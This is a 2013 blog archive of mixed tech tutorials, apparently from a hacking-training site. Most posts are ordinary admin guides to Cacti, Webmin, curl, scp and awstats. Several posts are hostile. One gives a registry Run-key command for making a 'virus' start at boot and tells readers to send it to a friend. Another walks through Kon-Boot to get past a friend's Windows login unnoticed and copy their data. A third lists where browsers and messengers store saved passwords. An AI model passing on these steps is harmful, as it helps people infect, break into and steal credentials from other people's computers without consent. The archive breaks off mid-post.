Monday, April 29, 2013

How to Install Cacti on Linux


Install Cacti, and others for dependency. Furthermore, httpd and PHP and MySQL are also needed.
[root@www ~]# yum --enablerepo=dag -y install cacti* net-snmp* rrdtool

[root@www ~]# vi /etc/snmp/snmpd.conf

com2sec notConfigUser default public

com2sec local localhost private

com2sec mynetwork 192.168.0.0/24 public

group notConfigGroup v1 notConfigUser
#
group notConfigGroup v2c notConfigUser
group MyROGroup v1 mynetwork
group MyROGroup v2c mynetwork
group MyROGroup v1 local
group MyROGroup v2c local

view systemview included .1.3.6.1.2.1.1
#
view systemview included .1.3.6.1.2.1.25.1.1
view all included .1 80

# line 66: make it comment and add lines next

#
access notConfigGroup "" any noauth exact systemview none none
access MyROGroup "" any noauth exact all none none
access MyRWGroup "" any noauth exact all all none


[root@www ~]# /etc/rc.d/init.d/snmpd start

Starting snmpd:                [  OK  ]

[root@www ~]# chkconfig snmpd on

[root@www ~]# mysqladmin -u root -p create cacti                  # create DB
Enter password:

[root@www ~]# mysql -p cacti < /var/www/cacti/cacti.sql   # import DB
Enter password:
[root@www ~]# mysql -u root –p      # login to MySQL

Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
# set password for cactiuser

mysql> 
grant all on cacti.* to cactiuser@localhost identified by 'password';

Query OK, 0 rows affected (0.00 sec)

mysql> 
exit

Bye

[root@www ~]# vi /var/www/cacti/include/config.php# change cactiuser's password

$database_password = "
password
";

[root@www ~]# 
chown -R apache. /var/www/cacti

[root@www ~]# 
vi /etc/httpd/conf.d/cacti.conf
allow from 127.0.0.1 
192.168.0.0/24


[root@www ~]# /etc/rc.d/init.d/httpd reload

Reloading httpd:     [  OK  ]

Initial settings for Cacti

Access to 'http://(your hostname or IP address)/cacti/'. Following screen is shown, then Click 'Next'.

Wednesday, April 3, 2013

curl: If-Modified-Since Command Linux / Unix Example

curl: If-Modified-Since Command Linux / Unix Example


TTP protocol allows a client to specify a time condition for the document it requests. It is If-Modified-Since or If-Unmodified-Since. How do I use curl Unix/Linux command line option to test a server with If-Modified-Since condition and validate Last-Modified settings?

You can use curl command to see if a copy (http resources such as text/html or image/png) that they hold is still valid. However, this will only work if response has a Last-Modified header. You can send a Last-Modified header using web server or your web application.

Step #1: Find out if response has a Last-Modified header

Type the following curl command:

curl --silent --head http://imagia.in/foo/bar/image.png curl --silent --head http://imagia.in/foo/help.html
OR

curl I http://imagia.in/foo/bar/image.png curl I http://imagia.in/foo/help.html


In this example, note down the Last-Modified headers in the response to this HEAD request:
$ curl -I http://www.imagia.in/faq/
Sample outputs:



HTTP/1.1 200 OK

Server: nginx

Date: Tue, 11 Dec 2012 10:10:24 GMT

Content-Type: text/html; charset=UTF-8

Connection: keep-alive

X-Whom: l2-com-cyber

Last-Modified: Tue, 11 Dec 2012 10:10:23 GMT

Cache-Control: max-age=299, must-revalidate

Vary: Cookie

X-Pingback: http://www.imagia.in/faq/xmlrpc.php

X-Galaxy: Andromeda-1

Vary: Accept-Encoding

Sample outputs:

The syntax is as follows to send If-Modified-Since header using the curl command line:
$ curl -I --header 'If-Modified-Since: DATE-FORMAT-HERE' http://imagia.in/foo/bar/image.png
$ curl -I --header 'If-Modified-Since: Tue, 11 Dec 2012 10:10:24 GMT' http://www.imagia.in/faq/

Sample outputs:
HTTP/1.1 304 Not Modified
Server: nginx
Date: Tue, 11 Dec 2012 10:12:11 GMT
Connection: keep-alive
X-Whom: l2-com-cyber
Vary: Cookie
Last-Modified: Tue, 11 Dec 2012 10:10:23 GMT
X-Galaxy: Andromeda-1
Vary: Accept-Encoding

The resource sends a 304 Not Modified response, indicating that it supports Last-Modified validation.

Tuesday, April 2, 2013

Red Hat Enterprise Linux 5 administration ebooks download

Red Hat Enterprise Linux 5 administration ebooks download

Here we go

Download Link  

RedHat Enterprise Linux 5 Administration

Lock/Unlock Computer With Pendrive

Lock/Unlock Computer With Pendrive

SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.

SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from Bind  View found a security hole in SYSKEY which indicates that a certain form of cryptanalytic attack is possible offline. A brute force attack then appeared to be possible.

Microsoft later collaborated with Bind View to issue a fix for the problem (dubbed the ‘Syskey Bug’) which appears to have been settled and SYSKEY has been pronounced secure enough to resist brute force attack.

According to Todd Sabin of the Bind View team RAZOR, the pre-RC3 versions of Windows 2000 were also affected.

So this is pretty cool, right?  Well, I really like the idea of keeping this on Floppy so that it requires a floppy disk (a sort of 2 factor (hardware/software) authentication?).

Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.

NOTE:  I haven’t tested copying data from 1 USB to another USB to see if it works as a backup.  This way you could lock up a USB drive as a spare if needed.

Here’s how to get this to work using a USB drive.

1.  Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.

2.  Fire up disk management and re-assign the drive letter it was given to “A”.

6 (1)

 

Start up disk management by clicking Start and typing diskmgmt.msc

 

2

 

Right-click the USB drive and choose to assign driver letter or path.

3 (1)

 

Assign it to letter “A”

4

 

Accept the warning message

5

Now your USB drive is “A”

3.  Run Syskey and save encryption to USB Drive “A”

1

 

Click Start and type syskey followed by hitting Enter

8

Syskey launched; Click “Update”7

Choose “Store Startup key on floppy disk” and click “OK”

9

 

You’ll be prompted to enter your diskette. Make sure your USB drive is inserted and writable.

4.  Reboot and have fun.  Don’t lose your USB disk!  Also, to revert this, you can run syskey again and choose to store it locally instead of “on a floppy disk”.

Convert Text Message to Voice Message without using any Tool

Convert Text Message to Voice Message without using any Tool

Hello Guys,

Today I have something good for you and i.e convert text message to voice. By following these steps you can convert the text message to voice message.

 Step1:Open the Notepad from Start>All Programs> Accessories.

Step2:Then copy-paste the following code in the text area.

Dim msg, sapi
msg=InputBox(“Enter your text for conversion: For Ex. Kyrion.”,”Kyrion.in: Text2Speech Converter”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Step3:Open File>Save as

Step4:Then in the Save As dialog box enter any name for the file with the extension .vbs and click on Save.

14





Step5:Then open the file that you had saved.

Step6:Enter the text which you want to convert to speech.

 

15

 

Step7:Click on OK button.

Now you will see the pure magic of Windows. After the Dialog box closes you will here what you had actually typed in the dialog box to  Convert Text Into Speech In Windows  by using notepad. You will be thrilled to know that your text has be converted in to speech.

Change View Mode of Magnifier in Windows 7

Change View Mode of Magnifier in Windows 7

Hey Guys,
Windows 7/Vista has a very nice feature of MAGNIFIER (to Use press ‘WinKey’ and ‘+’) some times when we change the view mode to Docked, other views mode get disabled and in this tut I am going to let you know that how to enable those options.

1) Go into the Registry (Start -> Run -> type in Regedit and then click OK).

2) Navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\ScreenMagnifier

3) Under the MagnificationMode DWORD value, change that to either 2 or 3.

4) Close Registry Editor

5) Restart the Computer

How to Execute virus on Start up

How to Execute virus on Start up

Hello guys,

You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.

So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.

So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up.

1. Open a Notepad file

2. Write down the following command

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe

3. Now save the notepad file with any name say kyrion but extension should be bat. Means we will have to create a batch file eg: kyrion.bat

4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.

5. Now the impact of the virus will also be visible after the restart of the system.

All Saved Password Location

All Saved Password Location

Google Chrome:

Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location

XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default

Trillian:

Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently

Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) – C:\Program Files\Trillian\users\

XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere their

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\global

MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[Account Name]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. They a set of Win API functions (Credential API’s) to store its’ security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the “target name” and “type”. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.

Paltalk:

Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]

Google Talk:

Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google

Talk\Accounts\[Account Name]

Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)

These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]

Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.

Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager

(”EOptions string” value)

Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.

The value stored in “ETS” value cannot be recovered back to the original password.

AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.

448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords
Filezilla:

Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this

Internet Explorer 4.00 – 6.00:

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.

The base key of the Protected Storage is located under the following key:

“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.

You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.

Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

Internet Explorer 7.00 – 8.00:

The new versions of Internet Explorer stores the passwords in 2 different locations.

AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.

Opera:

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile

Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 98/2000:

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]

You should search a filename with .s extension.

Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat

All other passwords are stored in Digsby servers.

Facebook Tips & Tricks

Facebook Tips & Tricks

Hello Guys,

This post of mine is just to make yourself easy with handling your social life. Here I will be telling you various shortcuts for Facebook in Google Chrome & Mozilla Firefox browser.

Chrome        Firefox                  Facebook
Alt+m           Shift+Alt+m           New Message
Alt+0            Shift+Alt+0            Help Center
Alt+1            Shift+Alt+1            Home Page
Alt+2            Shift+Alt+2            Profile Page
Alt+3            Shift+Alt+3            Manage Friend List
Alt+4            Shift+Alt+4            Message List
Alt+5            Shift+Alt+5            Notification Page
Alt+6            Shift+Alt+6            Account Settings
Alt+7            Shift+Alt+7            Privacy Settings
Alt+8            Shift+Alt+8            Facebook Fan Page
Alt+9            Shift+Alt+9            Facebook Terms
Alt+?            Shift+Alt+?              Search Box

 

Enjoy and Have Fun!!!

Cool Keyboard Tricks in Windows 7

Cool Keyboard Tricks in Windows 7

Hello Guys,

In this tutorial I am going to tell you Some of the cool tricks of Keyboard button which will help you to work more efficiently and faster. Even you can impress your friends or colleagues by using these shortcuts button.

 



























































































[Windows] + [D]Show or Hide the desktop
[Windows] + [Home]Minimize all but selected window. Reverse by clicking the key combination again.
[Windows] + [Spacebar]Make all open windows transparent to view gadgets and icons on desktop.
[Windows] + left arrow OR [Windows] + right arrowDock selected window to the left or right half of your screen.
[Windows] + up arrow OR [Windows] + down arrowMaximized and restores the selected window.
[Windows] + [Tab]Launch 3D representation of open windows and click [Tab] key again to flip through them.
[Windows] + [B]Puts focus on the ‘show hidden icons’ button on the system tray.
[Windows] + [1] To [Windows] + [9]Launch first through ninth icon on taskbar, including items pinned to taskbar.
[Windows] + [SHIFT] + [1] To [Windows] + [SHIFT] + [9]Starts new instance of respective taskbar icon.
[Windows] + [Alt] + [1] To [Windows] + [Alt] + [9]Opens jump list for respective icon.
[Windows] + [T] OR [Windows] + [SHIFT] + [T]Move focus to front or back of taskbar.
[Alt] + [Ctrl] + [Tab] + left/right/up/down arrowFlip window.
[Alt] + [Tab]Cycle through open windows.
[Windows] + [P]Select the Projector Mode
[Windows] + [+] OR [Windows] + [-]Activates Windows Magnifier to zoom in or out of screen.
[Ctrl] + [Alt] + [D]Switch to docked mode.
Ctrl] + [Alt] + [L]Switch to lense mode.
[Ctrl] + [Alt] + [F]Switch from docked or lens mode back to full screen mode.
[Ctrl] + [Alt] + [I]Invert colors.
[Windows] + [Esc]Exist magnifier views.
[Windows] + [G]Cycle through desktop gadgets.
[Windows] + [X]Launches Windows Mobility Center. Especially useful if you’re working on a laptop.

Chakravyuh Online Event Schedule

Chakravyuh Online Event Schedule


Dear Warrior,

We express our heartiest gratitude to you for becoming a part of Chakravyuh!

Hereby in this email, we would like to update you about the schedule of Chakravyuh.

30th March 2012 1700 Hrs:   Registration Closes

31st March 2012 1900 Hrs:   Chakravyuh Online Event Starts for 60 minutes

31st March 2012 2000 Hrs:   Chakravyuh Online Event Closes

1st April 2012 1800 Hrs:       Online Event Result Declaration


Stay tuned on www.chakravyuh.org


Special Instructions

·         Prepare of the following topics for Online Event

o   Web Hacking

o   System Hacking

o   Network Hacking

o   Reverse Engineering

o   Digital Forensics

·         Keep your Chakravyuh Login Password with you all the time

·         Forgot Password functionality will not be available during the Online Event

·         Be prepared with a High Speed Internet Connection for Online Event


 All the best!!!

How to Search Quickly into your System

How to Search Quickly into your System

In our computer it takes lots of time to search a file or folder, and for that also we have to dig out many folders. So in this tutorial I am going to post this article by which we can save our time while searching for a particular file or folder.  This trick will save the all sub directory and file names in text file without browsing the drive or folder.

At first open command Prompt and then browse the folder you want to analyze the sub directories and files by using cd commands.

For Example: If you want navigate to E:\hack

then in command prompt type e: and then cd hack

1. Now if you want to scan all the sub directories and files which are present inside these sub directories then type the following command

dir *.* /s /b > list.txt

2. If you want to see only pdf files then use this command

dir *.pdf /s /b > list.txt

3. In a similiar way, if you want to search only microsoft word files then use this command

dir *.doc /s /b > list.txt

4. Likewise if you want search a file with particular name say address.doc

dir address.* /s /b > list.txt

or

dir address.doc /s /b > list.txt

How to Lock Desktop Icons

How to Lock Desktop Icons

In this tutorial we’ll see how we can lock our desktop icons so that no one can make any changes to the icons that we have arranged in the desktop. Generally it happens when someone comes to our system and mess up the arrangement.

So for that open Registry and go to the following path

HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer.

Right-click in the right pane and select New, DWORD Value name NoSaveSettings and press the Enter key. Right-click on the new NoSaveSettings item and select Modify. Enter 1 in the Value data box. After this, whenever you restart Windows, your settings will return to their current state.

 

How to Hide a folder without any third party Software

How to Hide a folder without any third party Software

Step 1 : Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}



For eg,
If u’ve a folder with name “Anything”
press F2,
then type, “Anything.{645FF040-5081-101B-9F08-00AA002F954E}”
and Press Enter.

Step 2 : To get back to its original form,
Make a new batch file with any name and type
“ren Anything.{645FF040-5081-101B-9F08-00AA002F954E} Anything” .

How to Bypass Windows Authentication

How to Bypass Windows Authentication


Guys you must be knowing how to break the password of Windows by using some Live OS. But using Live OS is bit complicated and sometimes they take a lot of time to crack a password. So in this tutorial you will see how to bypass Windows OS so that you will not indulge in complicated situation and can save your time.

At first we need a software called Kon-Boot and we will have to make either CD or Pendrive bootable with this software. Kon-boot comes with many versions and but i am using Kon-boot v1.1 and below are the steps for making CD or Pendrive bootable.

 1. Insert your CD into your CD Rom or Plug in your Pendrive into your system.

2. Open Kon-Boot v1.1 folder.


aa1





3. For making Bootable CD go to KONCD and burn the image file.

4. For creating bootable pendrive go to KONUSB and double click on Konbootintall.exe and you will get a command prompt. Type the name of your Pendrive’s drive letter(i.e g: or h:).

cmd3

 

Thats all you have to do. Now your CD and Pendrive will get bootable.

Restart the system which you want to bypass, insert the Bootable CD of Konboot or Plugin your Pendrive. Make sure in Boot priority CD or USB should be in the first option. If it is not there then hit F12 at the BIOS screen and choose CD or USB in the first option. Now the system would start with the help of konboot and you will get this screen.

Now here choose Konboot v1.1 option

console

 

Click Enter after getting the following screen.lg1

 

Kon boot will modify the memory to let you login without knowing a password in windows.

kb1

 

In windows XP it will directly show Desktop without showing any login screen. For Windows7 it will show login Screen but it doesn’t mean that you need a particular password for it. Just type any random password or simply hit enter without giving any password and after that you will get the Desktop. Now you can take the control of the Whole system, you can modify anything, copy data into your pendrive etc. Now next time when your friend login he/she will get the same login screen with same password. It means your friend will not get any kind notification about his/her system which has been hacked by you.

Konboot can also bypass the authentication process of Linux (but not for all distros) and MAC OS.

Access Banned Torrent and Video Sites in India

Access Banned Torrent and Video Sites in India

Some of the ISPs in India have already started blocking torrent websites (The PirateBay, Torrentz, etc.) as well as some legal video sharing websites (like Vimeo, DailyMotion). Nowadays, when someone tries to access these websites, he/she may receive a rather annoying message:

Currently, two of the Indian ISPs – namely Reliance and Airtel – have blocked specific websites. The reason for blocking is yet unclear but the citing of a Court order in the display message gives us a clue. The US Government has already blocked websites in the past on grounds of copyright infringement and it is certain that other countries have also started to follow suit. Torrents have regularly provided users access to copyrighted content worldwide; particularly new movie releases which could be downloaded through torrents.

However, websites like Vimeo and DailyMotion are legal video sharing websites like Youtube and the reason is still unclear as to why these websites have been blocked as per “Court Orders”. In the coming days, we might also start seeing other service providers blocking number of websites on Governmental issues.

There is, however, a way users can still access these blocked websites legally without using a proxy. The trick lies in the protocol used for accessing the website. The sites being blocked in India are generally done so by using filters through the network that prevent the sites from opening. More often, these filters generally work on normal channels and don’t block secured websites.

You can access the Secured Version of the blocked websites using “https” instead of “http” in the address bar. When you open the blocked site with “https”, the website opens without any errors and you get a fully functional website.

13


 

54



53


 

Most people try to access these websites via Proxy; but using a proxy has its own disadvantages. The proxy network that a person is using maybe insecure. Moreover, proxys slow down network access speeds considerably. This is because all requests are channeled through the proxy server which handles a large number of clients, which causes slow response times.

Using https does not need a proxy and sites can be opened directly and response times are also quick as it is not channeled through any public server.

Disclaimer:  We DO NOT endorse any kind of piracy or copyrighted material. This article is strictly for educational and informational purposes only.

Working Of Zenmap ( Network Scanning Tool )

Zenmap is the official graphical user interface (GUI) for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scans can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

CHOSEN SETUP

As Zenmap runs on a windows/Linux so i chose the following setup :

Windows  OS – Windows 7 installed on a system

Version- Zenmap 6 (http://nmap.org/dist/nmap-6.00-setup.exe)

 Scanning

Begin Zenmap by typing zenmap in a terminal or by clicking the Zenmap icon in the desktop environment.

Firstly, select the Target. Target could be any domain name or the IP Address, so right now my target is  10.0.0.2.

download

 

Profile

Profile combo box. Profiles exist for several common scans. After selecting a profile the Nmap command line associated with it is displayed on the screen. Of course, it is possible to edit these profiles or create new ones.

It is also possible to type in an Nmap command and have it executed without using a profile. Just type in the command and press return or click “Scan”.

In Zenmap there are 10 Types of Profile :

a.  INTENSE SCAN

Command = nmap -T4 -A 10.0.0.2

Description  = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (–traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.

new14

SCAN RESULT TABS

Each scan window contains five tabs which each display different aspects of the scan results. They are:

a) Nmap Output

b) Ports / Hosts

c) Topology

d) Host Details

Each of these are discussed in this section:

NMAP OUTPUT

The “Nmap Output” tab is displayed by default when a scan is run. It shows the familiar Nmap terminal output.

PORT/HOSTS

When a service is selected, the “Ports / Hosts” tab shows all the hosts which have that port open or filtered. This is a good way to quickly answer the question “What computers are running HTTP?”

download (1)

 

TOPOLOGY


The “Topology” tab is an interactive view of the connections between hosts in a network.

 

download (2)

HOST DETAILS

The “Host Details” tab breaks all the information about a single host into a hierarchical display. Shown are the host’s names and addresses, its state (up or down), and the number and status of scanned ports. The host’s uptime, operating system, OS icon. When no exact OS match is found, the closest matches are displayed.

Transfer Files From One UNIX Server To Another Server Using Windows / Linux Desktop

transfer_imagesTransfer Files From One UNIX Server To Another Server Using Windows / Linux Desktop

Linux SCP Command explained

How do I securely transfer files from one UNIX / Linux server to another UNIX server using Windows or Linux desktop clients without using ftp client?

You need to use secure sftp or scp client for Windows XP / Vista / 7. Under Linux or Apple Mac OS X desktop you can use regular OpenSSH scp / sftp client to transfer files.

Windows SSH Client


You can use free SFTP, FTP and SCP client for Windows called putty or winscp.

Linux / UNIX / OS X SSH scp Client Examples


Use the following command from the server to which you want the files to go. In this example, transfer all files (/var/www/html) from remote server called server1 to local directory called /backup:
scp -r user@server1:/var/www/html/ /backup
In the following example, transfer all files (/var/www/html) from remote server called server1 to another server called server2:
scp -r user@server1:/var/www/html/ user@server2:/var/www/html/

Say hello to rsync


I recommend using rsync command which will only push or download updated files. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon. In this example, copy files from remote server called server1 into /backup directory:
rsync -avz -e ssh user@server1:/var/www/html /backup

How to Install and configure webmin on Linux

penguin-centos-logoHow to Install and configure webmin on Linux

Install Webmin that is web based system configuration tool for administrators.

Install required Perl module first.

[root@dlp ~]# yum -y install perl-Net-SSLeay

Download latest version of Webmin from here and install it.

[root@dlp ~]# wget http://download.webmin.com/download/yum/webmin-1.550-1.noarch.rpm

[root@dlp ~]# rpm -Uvh webmin-1.550-1.noarch.rpm 
warning: webmin-1.550-1.noarch.rpm: Header V3 DSA/SHA1 Signature, key ID 11f63c51: NOKEY
Preparing... ########################################### [100%]
Operating system is Generic Linux
1:webmin ########################################### [100%]
ip_tables: (C) 2000-2006 Netfilter Core Team
Webmin install complete. You can now login to https://www.server.world:10000/
as root with your root password.

[root@dlp ~]# 

vi /etc/webmin/miniserv.conf


# add at the last line: IP address you allow to access

allow=127.0.0.1 10.0.0.0/24


[root@dlp ~]# /etc/rc.d/init.d/webmin restart 

Stopping Webmin server in /usr/libexec/webmin
Starting Webmin server in /usr/libexec/webmin
Pre-loaded WebminCore

Access to "https://(hostname or IP address):10000/" with web browser, then login as root user.

 

 

1 (2)

 

Just logging. It's possible to configure on here without commands.

2 (2)

 

Wednesday, March 27, 2013

Scheduling awstats report generation

Scheduling awstats report generation


We've looked at running awstats reports, but only manually. Let's automate report generation so all you need to worry about is looking at those sweet, sweet numbers.




Automating awstats


In the previous article in this series we set up awstats for your site and ran an update of the reports manually. That's all well and good, but the command to update is big and ugly, and it would be kind of a pain to have to run it every time you want to view updated stats.

Fortunately Linux is chock full of ways to automate stuff. One way is to create a cron script to do all the updating, but since we're shooting for simple we should use a tool that's already processing your web logs on a regular basis. We can piggyback our updates onto logrotate's regular rotation tasks.

Scheduling reports with logrotate


With this approach we'll take advantage of the fact that logrotate is already performing regular log rotation for your domain. I mean, you do have your logs rotating automatically, right?

If not, visit this article series on logrotate and follow the directions there to set up log rotation for your virtual host. Log rotation keeps those logs from becoming giant disk-space-eating behemoths, so it's a very good idea. Really, do it now. I'll wait.

Now that we're certain you have logrotate managing your web logs, let's add a step to what logrotate does when it performs the rotation.

Editing the logrotate entry


Let's look at the logrotate.d file for a virtual host that's just a modification of the default entry for apache on Ubuntu:
/home/demo/public_html/example.com/logs/*.log {
weekly
missingok
rotate 52
compress
delaycompress
notifempty
create 640 root adm
sharedscripts
postrotate
if [ -f "`. /etc/apache2/envvars ; echo ${APACHE_PID_FILE:-/var/run/apache2.pid}`" ]; then
/etc/init.d/apache2 reload > /dev/null
fi
endscript
}

Don't worry too much about most of those entries if you haven't seen them before. There are only a couple important bits to note here.

First, take a look at the "weekly" directive in that logrotate file. That's okay for simple log rotation, but you probably want your web traffic stats updating daily. In that case you'd want to change that to "daily" so the rotate script runs more frequently, and possibly modify the "rotate 52" entry to keep more archived log files.

Next we look at what we want to add to the logrotate process. See that "postrotate" block up there? Don't worry about what's inside, just note that it's there. What that does is run some stuff after the log rotation is done (in this case, tell apache to reload if it's running). The reason we're looking at it is because there's also a "prerotate" directive that we can use to have awstats run through a log file before it's rotated.

The "prerotate" directive should run the stats update and generate the reports. And it should run just like the command we ran to get our reports. We would create a prerotate block like:
prerotate
/usr/local/awstats/tools/awstats_buildstaticpages.pl -update -config=www.example.com -dir=/home/demo/public_html/example.com/webstats -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl > /dev/null
endscript

The "> /dev/null" bit redirects the normal output of the command so it doesn't get sent to the console or emailed to root.

Inserted into the existing logrotate file for our virtual host, the whole thing would look like:
/home/demo/public_html/example.com/logs/*.log {
daily
missingok
rotate 52
compress
delaycompress
notifempty
create 640 root adm
sharedscripts
prerotate
/usr/local/awstats/tools/awstats_buildstaticpages.pl -update -config=www.example.com -dir=/home/demo/public_html/example.com/public/webstats -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl > /dev/null
endscript
postrotate
if [ -f "`. /etc/apache2/envvars ; echo ${APACHE_PID_FILE:-/var/run/apache2.pid}`" ]; then
/etc/init.d/apache2 reload > /dev/null
fi
endscript
}

And with that, every time the logs get rotated, the web stats get updated too.

Why use logrotate?


Instead of using logrotate to run the web stats update we could just schedule the stats to update through cron. So why insert the commands into logrotate?

The main reason is accuracy. By sticking a web stats update into the log rotation process we make sure that awstats is looking at log entries up until the last possible moment, when the log is rotated. If you have the web server reloading instead of restarting there might be a couple log entries missed (since the old log file would still be used as the old connections finish). The information lost in that case is negligible and not worth the downtime required to fully restart the web server.

If you want the web traffic reports to update more often than the web logs are rotated, you can use cron to run the update and report-building scripts on a more frequent schedule (like hourly). Awstats will recognize log entries that have already been processed and skip them when analyzing the data.

Monthly reports


Something you'll notice if you leave awstats running the way we've set it up is that the reports being generated only go into detail for the current month. Dividing the information up by month is a decent interval, but you may want to look at previous months in detail instead of only the current one.

So it's entirely optional, but if you'd like to keep monthly reports around it's really just a matter of tailoring a shell script to fit your site.

A cron script


We'll name the script after the awstats config file for the site in question and put it in the cron monthly directory. Using "www.example.com", we would create the file:
/etc/cron.monthly/awstats.www.example.com

Inside the file put the following script:
#!/bin/sh
#
# Run the awstats build script to generate a report for last month.
#

# Modify these 3 variables for your environment:
#
# The location of the awstats installation
AWSTATSDIR=/usr/local/awstats

# Your main domain, as you reported it to awstats
DOMAIN=www.example.com

# The directory where you're storing the reports for this domain
REPORTDIR=/home/demo/public_html/example.com/public/webstats

LASTMONTH=`date -d "last month" +%B`
LASTMONTHNUM=`date -d "last month" +%m`
LASTMONTHDIR=$REPORTDIR/$LASTMONTH

mkdir -p $LASTMONTHDIR
cp -Rf $AWSTATSDIR/wwwroot/icon $LASTMONTHDIR/awstatsicons

$AWSTATSDIR/tools/awstats_buildstaticpages.pl -month=$LASTMONTHNUM -update -config=$DOMAIN -dir=$LASTMONTHDIR -awstatsprog=$AWSTATSDIR/wwwroot/cgi-bin/awstats.pl > /dev/null

Change the values of "AWSTATSDIR", "DOMAIN", and "REPORTDIR" to match your environment and site.

After saving the file make your new script executable:
sudo chmod a+x /etc/cron.monthly/awstats.www.example.com

You can even run that script now to test it (and to get a detailed report for last month's data, if you have some). If you do, be sure to run it using sudo.

What it does


